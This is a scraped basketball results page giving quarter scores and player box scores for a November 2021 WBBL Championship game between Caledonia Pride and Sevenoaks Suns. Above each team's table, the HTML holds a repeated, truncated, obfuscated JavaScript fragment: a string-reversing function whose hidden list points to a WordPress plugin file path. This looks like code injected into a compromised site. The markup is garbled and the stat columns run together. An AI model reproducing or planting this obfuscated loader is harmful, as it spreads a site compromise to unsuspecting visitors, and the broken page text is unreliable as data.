Breaking news
  1. Highlights & Pictures
  2. Highlights: Queens v Pride
  3. Highlights & Pictures: Pride v Riders
  4. Highlights: Wolves v Pride
  5. Highlights & Pictures: Pride v Wolves
WBBL Championship 6th November 2021 - 3:00 pm

Recap

Details

Date Time League Season Full Time
6th November 2021 3:00 pm WBBL Championship 2021/22 40'

Results

Team1234T
Caledonia Pride111914953
Sevenoaks Suns1620152374

Caledonia Pride

<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0
# Player Position PTS REB AST STL BLK FGM FGA FG% 3PM 3PA 3P% FTM FTA FT% OFF DEF TO PF
16Aoife LoftusForward210001250.0000000100
50Eabha KerrForward521102728.61520.0020.0114
25Elise TweedieCenter08010050.0010.0000445
4Maud RangerGuard16900062128.631421.41333.3451
6Rose HarveyGuard11020041040.03837.5000002
5Sian PhillipsForward7163313742.9010.01333.34121
22Sophie LoughranForward311011812.51425.0000102
8Taryn CumminsGuard401102728.6020.0000001
27Zoe SharpeGuard03000000000000120
11Taylor EdwardsGuard5121021216.70001250.0014
 Total 53411072217926.683522.931030.01625020

Sevenoaks Suns

<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0<td class="data-$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/t" data-label="TO">0
# Player Position PTS REB AST STL BLK FGM FGA FG% 3PM 3PA 3P% FTM FTA FT% OFF DEF TO PF
15J. Fritz-1651107977.811100.01250.0053
22C. Carr-151341161833.3010.03475.0491
9J. Koppl-15761371163.60001333.3432
44J. Thompson-71362421020.0010.03475.02111
10F. Wurtz-655102922.2030.02450.0142
1K. Richards-2000111100.0000000000
13Z. Franklin-2110011100.0000000012
7A. Allum-00000000000000000
14A. Watkins-01000000000000011
8R. Busch-00000000000000000
 Total 63452369265944.11616.7101758.81134012